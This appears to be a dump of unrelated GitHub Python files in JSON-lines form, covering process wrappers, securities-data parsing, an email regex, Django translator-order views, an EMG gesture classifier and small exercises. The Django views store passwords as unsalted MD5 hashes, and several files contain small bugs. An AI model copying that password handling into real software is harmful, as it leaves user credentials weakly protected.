\"+name)\n self.stderr = Queue(\"stderr for \"+name)\n\n with Command.available_locker:\n avail = Command.available_process.setdefault(self.key, [])\n if not avail:\n self.process = Process(\"command shell\", [cmd()], cwd, env, debug, shell, bufsize)\n self.process.stdin.add(set_prompt())\n self.process.stdin.add(\"echo %errorlevel%\")\n _wait_for_start(self.process.stdout, Null)\n else:\n self.process = avail.pop()\n\n self.process.stdin.add(\" \".join(cmd_escape(p) for p in params))\n self.process.stdin.add(\"echo %errorlevel%\")\n self.stdout_thread = Thread.run(\"\", self._stream_relay, self.process.stdout, self.stdout)\n self.stderr_thread = Thread.run(\"\", self._stream_relay, self.process.stderr, self.stderr)\n self.returncode = None\n\n def join(self, raise_on_error=False, till=None):\n try:\n try:\n # WAIT FOR COMMAND LINE RESPONSE ON stdout\n self.stdout_thread.join()\n except Exception as e:\n Log.error(\"unexpected problem processing stdout\", cause=e)\n\n try:\n self.stderr_thread.please_stop.go()\n self.stderr_thread.join()\n except Exception as e:\n Log.error(\"unexpected problem processing stderr\", cause=e)\n\n if raise_on_error and self.returncode != 0:\n Log.error(\n \"{{process}} FAIL: returncode={{code}}\\n{{stderr}}\",\n process=self.name,\n code=self.returncode,\n stderr=list(self.stderr)\n )\n return self\n finally:\n with Command.available_locker:\n Command.available_process[self.key].append(self.process)\n\n\n def _stream_relay(self, source, destination, please_stop=None):\n \"\"\"\n :param source:\n :param destination:\n :param error: Throw error if line shows up\n :param please_stop:\n :return:\n \"\"\"\n prompt_count = 0\n prompt = PROMPT + \">\"\n line_count = 0\n\n while not please_stop:\n value = source.pop(till=please_stop)\n if value is None:\n destination.add(THREAD_STOP)\n return\n elif value is THREAD_STOP:\n destination.add(THREAD_STOP)\n return\n elif line_count==0 and \"is not recognized as an internal or external command\" in value:\n Log.error(\"Problem with command: {{desc}}\", desc=value)\n elif value.startswith(prompt):\n if prompt_count:\n # GET THE ERROR LEVEL\n self.returncode = int(source.pop(till=please_stop))\n destination.add(THREAD_STOP)\n return\n else:\n prompt_count += 1\n else:\n line_count += 1\n destination.add(value)\n\n\ndef _wait_for_start(source, destination):\n prompt = PROMPT + \">\"\n\n while True:\n value = source.pop()\n if value.startswith(prompt):\n # GET THE ERROR LEVEL\n returncode = int(source.pop())\n destination.add(THREAD_STOP)\n return\n destination.add(value)\n","repo_name":"mozilla/jx-sqlite","sub_path":"vendor/mo_threads/multiprocess.py","file_name":"multiprocess.py","file_ext":"py","file_size_in_byte":10972,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"21"} +{"seq_id":"37563434691","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author : yanpan\n# @Time : 2022/8/19 15:01\n# @Site : \n# @File : dfcf_securities_parsing.py\n# @Software: PyCharm\nfrom data.ms.genralhandler import *\n\n\ndef dfcf_parsing_data(rs, data_):\n bzj_data = []\n rz_data = []\n rq_data = []\n rzrq_data = []\n stockgroup_data = []\n if rs[2] == '2':\n logger.info(f'东方财富证券可充抵保证金证券解析开始...')\n for data in data_:\n market = data[3]\n sec_code = data[0]\n sec_name = data[1]\n # rate = round(float(str(data[2]).strip('%')), 3)\n rate = rate_is_normal_two(data[2])\n bzj_data.append([market, sec_code, sec_name, rate])\n securities_bzj_parsing_data(rs, 3, bzj_data)\n logger.info(f'东方财富证券可充抵保证金证券解析结束...')\n time.sleep(5)\n logger.info(f'东方财富证券集中度分组数据解析开始...')\n # 集中度分组数据解析\n for _data in data_:\n market =_data[3]\n sec_code = _data[0]\n sec_name = _data[1]\n stockgroup_name = None\n stock_group = _data[4]\n if stock_group == 'A组':\n stockgroup_name = 1\n elif stock_group == 'B组':\n stockgroup_name = 2\n elif stock_group == 'C组':\n stockgroup_name = 3\n elif stock_group == 'D组':\n stockgroup_name = 4\n elif stock_group == 'E组':\n stockgroup_name = 5\n elif stock_group == 'F组':\n stockgroup_name = 6\n else:\n stockgroup_name = 0\n stockgroup_data.append([market, sec_code, sec_name, stockgroup_name])\n\n securities_stockgroup_parsing_data(rs, 4, stockgroup_data)\n logger.info(f'东方财富证券集中度分组数据解析结束...')\n\n elif rs[2] == '3':\n logger.info(f'东方财富证券融资融券标的证券解析开始...')\n for data in data_:\n sec_code = data[0]\n sec_name = data[1]\n # rz_rate = round(float(str(data[2]).strip('%')), 3)\n # rq_rate = round(float(str(data[3]).strip('%')), 3)\n rz_rate = rate_is_normal_two(data[2])\n rq_rate = rate_is_normal_two(data[3])\n rzrq_data.append([sec_code, sec_name, rz_rate, rq_rate])\n\n temp_data = securities_normal_parsing_data(rzrq_data)\n for temp in temp_data:\n if len(temp) == 6:\n rz_data.append([temp[0], temp[1], temp[2], temp[4], temp[5]])\n rq_data.append([temp[0], temp[1], temp[3], temp[4], temp[5]])\n else:\n logger.error(f'该条记录无证券id{temp},需人工修复!')\n\n logger.info(f'东方财富证券融资标的证券解析开始...')\n securities_rzrq_parsing_data(rs, 1, rz_data)\n logger.info(f'东方财富证券融资标的证券解析结束...')\n\n time.sleep(5)\n logger.info(f'东方财富证券融券标的证券解析开始...')\n securities_rzrq_parsing_data(rs, 2, rq_data)\n logger.info(f'东方财富证券融券标的证券解析结束...')\n\n logger.info(f'东方财富证券融资融券标的证券解析结束...')\n\n","repo_name":"ljcute/data-parsing","sub_path":"data/ms/securities/dfcf_securities_parsing.py","file_name":"dfcf_securities_parsing.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74532140532","text":"import json\nimport ndjson\nimport zipfile\nimport lxml, lxml.etree\nfrom rich.progress import track\n\nz = zipfile.ZipFile(\"xml_pd.zip\")\nparser = lxml.etree.XMLParser(resolve_entities=False)\n\nDATA = {}\nISSUES = []\nfor file_info in track(z.infolist()):\n file_contents = z.read(file_info)\n try:\n doc = lxml.etree.fromstring(file_contents, parser)\n levels = []\n for i_d1, d1 in enumerate(doc.xpath(\"text/body/div\")):\n levels.append(str(i_d1 + 1))\n for i_d2, d2 in enumerate(d1.xpath(\"div\")):\n levels.append(f\"{i_d1+1}.{i_d2+1}\")\n DATA[file_info.filename] = levels\n except lxml.etree.XMLSyntaxError:\n ISSUES.append(file_info.filename)\n\nopen(\"dbnl.ndjson\", \"w\").write(ndjson.dumps(DATA.items()))\n","repo_name":"epoz/dts-hackathon-2021","sub_path":"parse_tei.py","file_name":"parse_tei.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30488342033","text":"# Regex = Regular Expression\n# a-z\n# 0-9\n# . _ at a 1 time\n# @ at a 1 time\n# . at 2, 3 index\n\nimport re # re = regular expression\n\n# ^ symbol for start in regex\n# [] for enclosed condition\n# + symbol for add condition in regex\n# \\ symbol for searching in regex\n# ? symbol for true/false statement in regex\n# \\w symbol for reverse search\n# $ symbol for reverse\nemail_condition = \"^[a-z]+[\\._]?[a-z 0-9]+[@]\\w+[.]\\w{2,3}$\"\nuser_email = input(\"Enter Your Email Here: \")\n\nif re.search(email_condition, user_email):\n print(\"Yup, Email is Valid!\")\nelse:\n print(\"Email is Invalid!\")","repo_name":"Fakher-Zaman/Python-Projects","sub_path":"Email_Validation_Using_Regex.py","file_name":"Email_Validation_Using_Regex.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37845475898","text":"from django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nfrom .models import Translator, TranslatorAuth\r\nfrom orders.models import Order\r\nfrom .utils.Utils import *\r\nfrom manager.models.Manager import ManagerAuth\r\nfrom manager.utils.Utils import send_push_notification\r\nfrom registration.models.Client import Client, ClientAuth\r\nfrom registration.utils.Utils import converter_ru_to_lt\r\nimport datetime\r\nimport hashlib\r\n\r\n\r\ndef index(request):\r\n all_translators = Translator.objects.all()\r\n return render(request, 'translator/index.html', locals())\r\n\r\n\r\ndef new(request):\r\n if \"name\" not in request.POST or \"surname\" not in request.POST or \"email\" not in request.POST \\\r\n or \"phone\" not in request.POST or \"direction\" not in request.POST \\\r\n or \"username\" not in request.POST or \"password\" not in request.POST \\\r\n or \"mid\" not in request.POST or \"token\" not in request.POST or 'languages' not in request.POST:\r\n return JsonResponse({\"response\": \"f_error\", \"id\": \"\"})\r\n try:\r\n manager = ManagerAuth.objects.get(m_id=request.POST[\"mid\"])\r\n except ManagerAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if manager.token != request.POST['token']:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if Translator.objects.filter(phone=request.POST['phone']).exists():\r\n return JsonResponse({\"response\": \"ex_error\", \"id\": \"\"})\r\n translator = Translator()\r\n translator.name = request.POST['name']\r\n translator.surname = request.POST['surname']\r\n translator.email = request.POST['email']\r\n translator.phone = request.POST['phone']\r\n translator.direction = request.POST['direction']\r\n translator.languages = request.POST['languages']\r\n tmp_id = '{0}{1}{2}'.format(translator.surname[0], translator.name[0], translator.phone)\r\n translator.t_id = converter_ru_to_lt(tmp_id)\r\n translator.reg_date = datetime.date.today().strftime(\"%d.%m.%Y\")\r\n translator.busy = \"0\"\r\n translator.save()\r\n hash_pswd = hashlib.md5(request.POST['password'].encode('utf-8')).hexdigest()\r\n translator_auth = TranslatorAuth()\r\n translator_auth.t_id = translator.t_id\r\n translator_auth.username = request.POST[\"username\"].lower()\r\n translator_auth.password = hash_pswd\r\n translator_auth.save()\r\n return JsonResponse({\"response\": \"ok\", \"id\": translator.t_id})\r\n\r\n\r\ndef authentication(request):\r\n if 'username' not in request.POST or 'password' not in request.POST:\r\n return JsonResponse({\"response\": \"f_error\", \"id\": \"\", \"token\": \"\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(username=request.POST['username'].lower())\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"id\": \"\", \"token\": \"\"})\r\n hash_psw = hashlib.md5(request.POST['password'].encode('utf-8')).hexdigest()\r\n if hash_psw != translator_auth.password:\r\n return JsonResponse({\"response\": \"denied\", \"id\": \"\", \"token\": \"\"})\r\n new_token = generate_token()\r\n t_id = translator_auth.t_id\r\n translator_auth.token = new_token\r\n translator_auth.save()\r\n return JsonResponse({\"response\": \"access\", \"id\": t_id, \"token\": new_token})\r\n\r\n\r\ndef de_authentication(request):\r\n # TODO: удалить токен и указать что не онлайн.\r\n return JsonResponse({\"response\": \"OK\"})\r\n\r\n\r\ndef get_archive(request):\r\n if 'oid' not in request.GET:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n # TODO: Добавить проверку на ошибку \"field_error\" в FTST\r\n oid = request.POST['oid']\r\n try:\r\n order = Order.objects.get(o_id=oid)\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"order not exist\"})\r\n return take_response_for_archive(order.arch_path)\r\n\r\n\r\ndef send_archive(request):\r\n if 'tid' not in request.POST or 'token' not in request.POST or 'oid' not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\", \"data\": \"\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST['tid'])\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"data\": \"\"})\r\n if request.POST['token'] != translator_auth.token:\r\n return JsonResponse({\"response\": \"error_t\", \"data\": \"\"})\r\n try:\r\n translator = Translator.objects.get(t_id=translator_auth.t_id)\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_itb\", \"data\": \"\"})\r\n archive = Order.objects.get(o_id=request.POST['oid']).arch_path\r\n if send_arch_to_email(translator.email,\r\n 'Файл заказа id:' + request.POST['oid'],\r\n 'Добрый день \\n Файл по вложении!',\r\n archive):\r\n return JsonResponse({\"response\": \"send_email_ok\", \"data\": translator.email})\r\n else:\r\n return JsonResponse({\"response\": \"error_send\"})\r\n\r\n\r\ndef get_orders(request):\r\n if 'tid' not in request.POST or 'token' not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST['tid'])\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if request.POST['token'] != translator_auth.token:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n translator = Translator.objects.get(t_id=request.POST['tid'])\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n orders = translator.order_set.filter(status=3)\r\n # orders = translator.orders.all().filter(orders__status='2')\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n if len(orders) == 0:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n orders_dict = {}\r\n orders_records = []\r\n orders_dict[\"response\"] = \"ok\"\r\n for translators_orders in orders:\r\n order_id = translators_orders.o_id\r\n order_date_end = translators_orders.date_end\r\n order_lang = translators_orders.lang_from + '-' + translators_orders.lang_to\r\n order_direction = translators_orders.direction\r\n order_pages = translators_orders.pages\r\n order_price = translators_orders.price_to_translator\r\n record = {\"id\": order_id, \"deadline\": order_date_end, \"language\": order_lang,\r\n \"direction\": order_direction, \"pageCount\": order_pages, \"price\": order_price}\r\n orders_records.append(record)\r\n orders_dict[\"orders\"] = orders_records\r\n return JsonResponse(orders_dict)\r\n\r\n\r\ndef get_my_orders(request):\r\n if 'tid' not in request.POST or 'token' not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST['tid'])\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if request.POST['token'] != translator_auth.token:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n translator = Translator.objects.get(t_id=request.POST['tid'])\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n orders = translator.order_set.filter(status__in=[4, 5])\r\n # i_end_int__gte = x, i_begin_int__lte = x\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n if len(orders) == 0:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n orders_dict = {}\r\n orders_records = []\r\n orders_dict[\"response\"] = \"ok\"\r\n for translators_orders in orders:\r\n order_id = translators_orders.o_id\r\n order_date_end = translators_orders.date_end\r\n order_lang = translators_orders.lang_from + '->' + translators_orders.lang_to\r\n order_direction = translators_orders.direction\r\n order_pages = translators_orders.pages\r\n order_price = translators_orders.price_to_translator\r\n order_status = translators_orders.status\r\n record = {\"id\": order_id, \"deadline\": order_date_end, \"language\": order_lang,\r\n \"direction\": order_direction, \"pageCount\": order_pages, \"price\": order_price, \"status\": order_status}\r\n orders_records.append(record)\r\n orders_dict[\"orders\"] = orders_records\r\n return JsonResponse(orders_dict)\r\n\r\n\r\ndef take_an_order(request):\r\n if \"tid\" not in request.POST or \"oid\" not in request.POST or \"token\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\", \"data\": \"\"})\r\n try:\r\n if TranslatorAuth.objects.get(t_id=request.POST[\"tid\"]).token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"error_t\", \"data\": \"\"})\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"data\": \"\"})\r\n try:\r\n order = Order.objects.get(o_id=request.POST[\"oid\"])\r\n client = Client.objects.get(c_id=order.customer_id)\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_one\", \"data\": \"\"})\r\n except Client.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_cne\", \"data\": \"\"})\r\n if order.status != \"3\":\r\n return JsonResponse({\"response\": \"error_s\", \"data\": \"\"})\r\n order.status = \"4\"\r\n order.translators.clear()\r\n order.translators.add(Translator.objects.get(t_id=request.POST[\"tid\"]))\r\n order.save()\r\n client_fcm_token = [ClientAuth.objects.get(c_id=client.c_id).fcm_token]\r\n client.order_status = \"4\"\r\n client.save()\r\n send_push_notification(\"Найден переводчик\", \"Теперь Ваш заказ в процессе перевода\", client_fcm_token)\r\n return JsonResponse({\"response\": \"tao_ok\", \"data\": \"\"})\r\n\r\n\r\ndef complete_order(request):\r\n if \"tid\" not in request.POST or \"oid\" not in request.POST or \"token\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\", \"data\": \"\"})\r\n try:\r\n if TranslatorAuth.objects.get(t_id=request.POST[\"tid\"]).token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"error_t\", \"data\": \"\"})\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"data\": \"\"})\r\n try:\r\n order = Order.objects.get(o_id=request.POST[\"oid\"])\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_one\", \"data\": \"\"})\r\n order.status = \"5\"\r\n order.save()\r\n return JsonResponse({\"response\": \"finish_ok\", \"data\": \"\"})\r\n\r\n\r\ndef save_fcm_token(request):\r\n if \"tid\" not in request.POST or \"token\" not in request.POST or \"fcm_token\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST[\"tid\"])\r\n except Client.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if translator_auth.token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"denied\"})\r\n translator_auth.fcm_token = request.POST[\"fcm_token\"]\r\n translator_auth.save()\r\n return JsonResponse({\"response\": \"ok\"})\r\n\r\n\r\ndef cancel_order(request):\r\n if \"tid\" not in request.POST or \"token\" not in request.POST or \"oid\" not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST[\"tid\"])\r\n except Client.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if translator_auth.token != request.POST[\"token\"]:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n order = Order.objects.get(o_id=request.POST['oid'])\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"order_not_exists\"})\r\n trans = Translator.objects.get(t_id=request.POST[\"tid\"])\r\n order.translators.remove(trans)\r\n order.save()\r\n if order.translators.count() == 0:\r\n order.status = '9'\r\n order.save()\r\n return JsonResponse({'response': 'ca_ok'})\r\n","repo_name":"atabayev/ftss","sub_path":"translator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36799889123","text":"a, b = [3, 2, 1], [6, 9]\n\n# 两个列表元素合并成一个列表\n# map(func, *iterables)\nlis = list(map(lambda x0, x1: f'{x0}-{x1}', a, b))\nprint(lis)\n\n\n# iter(object)返回迭代器\nlis = {'na': 12, 'key': \"dyq\"}\na = iter(lis.items()) # 二元元祖迭代器\nfor i in a:\n print(i)","repo_name":"diaoyuqiang/python","sub_path":"列表合并及iter函数.py","file_name":"列表合并及iter函数.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16967777867","text":"\nimport sys\nsys.stdin = open('1526.txt')\n\n# 금민수는 4, 7로만 이루어진 수를 말함\n# N보다 작거나 같은 금민수중 가장 큰 것을 출력하는 프로그램\n\nN = int(input())\n\nwhile N >= 4: # n은 4보다 크거나 같다고 했으므로 4보다 작아질 경우 종료하게끔 설정\n cnt = 0 # cnt\n for i in str(N): # N을 문자열로 바꾼다음 순회\n if i == '4' or i == '7': # 4, 7이 있다면\n cnt += 1 # cnt 1을 해준다\n if cnt == len(str(N)): # 문자열의 길이와 cnt가 일치하면\n print(N) # N을 프린트해주고\n break # 브레이크\n else: # 다르다면\n N -= 1 # N에서 1빼준다\n","repo_name":"wdahlia/Python-Algorithm","sub_path":"KDT 실습/0809 BOJ_N/1526_가장큰금민수.py","file_name":"1526_가장큰금민수.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"10499097208","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pylab as plt\nimport os\nimport pandas as pd\nimport numpy as np\nimport scipy\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import cross_val_score\nimport pickle\n\n\ndef extractStatisticalfeatures(x):\n fstd=np.std(x)\n fmax=np.max(x)\n fmin=np.min(x)\n fpp=fmax-fmin\n zero_crosses = np.nonzero(np.diff(x > 0))[0]\n fzero=zero_crosses.size/len(x)\n frms = np.sqrt(np.mean(np.square(x)))\n \n return fstd, fmin, fpp, fzero, frms \n\npath = \"./EMG_data_for_gestures-master/\"\nfolders = [file for file in os.listdir(path) if not file.startswith('.')]\n\nall_data = pd.DataFrame()\n\nfor folder in folders:\n files = [file for file in os.listdir(path+folder) if not file.startswith('.')]\n print (folder, files)\n for file in files:\n current_data = pd.read_csv(path+folder+\"/\"+file,sep='\\t') \n all_data = pd.concat([all_data,current_data])\n\nall_data=all_data.dropna()\n\nwinsize=1000\nwinhop=50\n\n\nfstd=[]\nfmin=[]\nfpp=[]\nfzero=[]\nfrms=[]\nflabel=[]\n\nch1mean=[]\nch2mean=[]\nch3mean=[]\nch4mean=[]\nch5mean=[]\nch6mean=[]\nch7mean=[]\nch8mean=[]\n\nfpercent=[]\nflabel2=[]\nfor i in range(0,len(all_data),winhop):\n selmat=all_data.iloc[i:i+winsize, 1:9].to_numpy().flatten()\n \n s,mi,pp,z,r = extractStatisticalfeatures(selmat) \n fstd.append(s)\n fmin.append(mi),\n fpp.append(pp)\n fzero.append(z)\n frms.append(r)\n \n ch1mean.append(all_data.iloc[i:i+winsize,1].mean())\n ch2mean.append(all_data.iloc[i:i+winsize,2].mean())\n ch3mean.append(all_data.iloc[i:i+winsize,3].mean())\n ch4mean.append(all_data.iloc[i:i+winsize,4].mean())\n ch5mean.append(all_data.iloc[i:i+winsize,5].mean())\n ch6mean.append(all_data.iloc[i:i+winsize,6].mean())\n ch7mean.append(all_data.iloc[i:i+winsize,7].mean())\n ch8mean.append(all_data.iloc[i:i+winsize,8].mean())\n \n bincountlist=np.bincount(all_data.iloc[i:i+winsize,-1].to_numpy(dtype='int64'))\n most_frequent_class=bincountlist.argmax()\n flabel.append(most_frequent_class)\n \n percentage_most_frequent=bincountlist[most_frequent_class]/len(all_data.iloc[i:i+winsize,-1].to_numpy(dtype='int64'))\n fpercent.append(percentage_most_frequent)\n \n if percentage_most_frequent==1.0:\n most_frequent_class2=most_frequent_class\n else:\n bincountlist[most_frequent_class]= 0\n most_frequent_class2=bincountlist.argmax()\n \n flabel2.append(most_frequent_class2)\n \nrdf = pd.DataFrame(\n {'ch1mean': ch1mean,\n 'ch2mean': ch2mean,\n 'ch3mean': ch3mean,\n 'ch4mean': ch4mean,\n 'ch5mean': ch5mean,\n 'ch6mean': ch6mean,\n 'ch7mean': ch7mean,\n 'ch8mean': ch8mean,\n 'std': fstd,\n 'min': fmin,\n 'peak-to-peak':fpp,\n 'zerocross':fzero,\n 'rms':frms,\n 'label':flabel,\n 'percent':fpercent,\n '2ndlabel':flabel2\n \n})\n\nrdf = rdf[rdf.label != 0]\nrdf = rdf[rdf.label != 7]\n\n\nrdf.to_csv(\"___emg_gesture_ws\"+str(winsize)+\"_hop\"+str(winhop)+\".csv\", index = None, header=True)\n\nrdf = pd.read_csv('___emg_gesture_ws1000_hop50.csv')\n\nX=rdf.iloc[:,:-3]\ny=rdf.iloc[:,-3]\n\n#Selecting Features\nX=rdf[[\"zero8\",\"pp4\",\"zero7\",\"min4\",\"rms5\"]]\ny=rdf[\"label\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n\n# Initialize the models\nrf = RandomForestClassifier()\nada = AdaBoostClassifier()\ngbc = GradientBoostingClassifier()\ndt = DecisionTreeClassifier()\nknn = KNeighborsClassifier()\nmlp = MLPClassifier()\n\n# Create a list of the models\nmodels = [rf, ada, gbc, dt, knn, mlp]\n\nresults = {}\n\n# Iterate over the models and perform 10-fold cross-validation\nfor model in models:\n scores = cross_val_score(model, X_train, y_train, cv=5)\n results[model] = scores\n\naccscores=[]\nfor model in models:\n accscores.append(np.mean(results[model]))\n print(model, accscores[-1])\n\nplt.figure()\nplt.bar(range(len(accscores)), accscores, tick_label=models)\nplt.grid()\nplt.legend()\nplt.show()\n \n# Find the best performing model\nbest_model = max(results, key=lambda x: np.mean(results[x]))\nclf = best_model\nclf.fit(X_train, y_train)\n\n# Save the best model to a pickle file\nwith open(\"selectedModel.pkcls\", \"wb\") as f:\n pickle.dump(clf, f)\n\n","repo_name":"BuseBeker/EMG-Key-Sliding-Window","sub_path":"EMG-Key-Sliding-Window/Final_02_Part01.py","file_name":"Final_02_Part01.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15097907845","text":"from __future__ import absolute_import, division, print_function\n\nfrom .. import learner\nfrom .. import nn_set\nfrom .. import tools\n\n\ndefcfg = learner.Learner.defcfg._deepcopy()\ndefcfg.classname = 'learners.NNLearner'\n\nclass NNLearner(learner.Learner):\n \"\"\"\"\"\"\n\n defcfg = defcfg\n\n def __init__(self, cfg, nnset=None):\n super(NNLearner, self).__init__(cfg)\n self.nnset = nnset if nnset is not None else nn_set.NNSet()\n\n def _predict(self, m_signal):\n \"\"\"Predict the effect of an order\"\"\"\n m_v = tool.to_vector(m_signal)\n dists, m_idx = self.nnset.nn_x(m_v, k=1)\n s_vector = self.nnset.ys[m_idx[0]]\n return tools.to_signal(s_vector, self.s_channels)\n\n def _infer(self, s_signal):\n \"\"\"Infer the motor command to obtain an effect\"\"\"\n s_v = tool.to_vector(s_signal)\n dists, s_idx = self.nnset.nn_y(s_v, k=1)\n m_vector = self.nnset.xs[s_idx[0]]\n return tools.to_signal(m_vector, self._m_channels)\n\n def _update(self, m_signal, s_signal, uuid=None):\n m_v = tools.to_vector(m_signal, self._m_channels)\n s_v = tools.to_vector(s_signal, self.s_channels)\n self.nnset.add(m_v, s_v, uuid=uuid)\n","repo_name":"benureau/learners","sub_path":"learners/algorithms/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39807583503","text":"import sys\r\n\r\nfrom MicroHamudi.Exceptions.CompilerExceptions import *\r\n\r\n\r\ndef format_hex(hex_str, length):\r\n \"\"\"Return a hex-string with fixed length (filled with '0')\"\"\"\r\n while len(hex_str) < length:\r\n hex_str = \"0\" + hex_str\r\n return hex_str\r\n\r\n\r\ndef handle_int(int_imm):\r\n \"\"\"Format the given immediate as int and return it's string representation\"\"\"\r\n # if bigger than 2^15 - 1 or smaller than -2^15 (16-Bit signed int limits) raise an exception\r\n if int_imm > (2 ** 15 - 1) or int_imm < -(2 ** 15):\r\n raise WrongImmediateException(\"\\nThe number must be representable with signed 16-Bit.\"\r\n \" Given number: '\" + str(int_imm) + \"' cannot be represented\"\r\n \" as signed 16-Bit Integer\")\r\n else:\r\n # flip the number if negative due to it's hex representation (ffff for -1)\r\n if int_imm < 0:\r\n int_imm = 2 ** 16 + int_imm\r\n\r\n # return the string representation of the hex-number without '0x'\r\n return str(hex(int_imm))[2:]\r\n\r\n\r\ndef handle_float(float_imm):\r\n \"\"\"Format the given immediate as float and return it's string representation\"\"\"\r\n # try to round the number and message the wrong format\r\n print(\"Floating-point numbers are not supported! Rounding the number to an int...\")\r\n float_imm = int(float_imm)\r\n return handle_int(float_imm)\r\n\r\n\r\ndef handle_string(str_imm):\r\n \"\"\"Take the immediate as string and return it's formatted string representation\"\"\"\r\n try:\r\n if '0x' in str_imm:\r\n # hex-str\r\n str_imm = str_imm[2:]\r\n str_imm = format_hex(str_imm, 4)\r\n\r\n int_imm = int(str_imm, 16)\r\n\r\n if str_imm[0].upper() in \"89ABCDEF\":\r\n int_imm -= 2 ** 16\r\n\r\n str_imm = handle_int(int_imm)\r\n else:\r\n # dec-str\r\n str_imm = handle_int(int(str_imm))\r\n\r\n return str_imm\r\n except ValueError:\r\n print(\"ValueError: Wrong immediate-format: for hex please use '0x'!\")\r\n sys.exit(-1)\r\n\r\n\r\ndef handle_registry(reg):\r\n \"\"\"Format the given registry as string (or make it a string) and return formatted registry string as hex\"\"\"\r\n try:\r\n # Check what instance the given registry is and format it accordingly\r\n if isinstance(reg, int):\r\n if reg < 0:\r\n raise ValueError\r\n reg = str(hex(reg))[2:]\r\n elif isinstance(reg, float):\r\n if int(reg) < 0:\r\n raise ValueError\r\n reg = str(hex(int(reg)))[2:]\r\n elif isinstance(reg, str):\r\n if '0x' in reg or 'x' in reg:\r\n reg = reg[2:]\r\n else:\r\n reg = str(hex(int(reg)))[2:]\r\n\r\n if len(reg) > 1:\r\n raise WrongRegistryIndexException(\"\\nNo Registry with index '\"\r\n + str(hex(int(reg, 16))).upper().replace('X', 'x')\r\n + \"' is available!\")\r\n else:\r\n return reg\r\n\r\n except ValueError:\r\n print(\"ValueError: Non-existing index '\" + str(reg).upper() + \"'! If hex, please use 0x.\")\r\n sys.exit(-1)\r\n\r\n\r\ndef handle_immediate(imm):\r\n \"\"\"Format 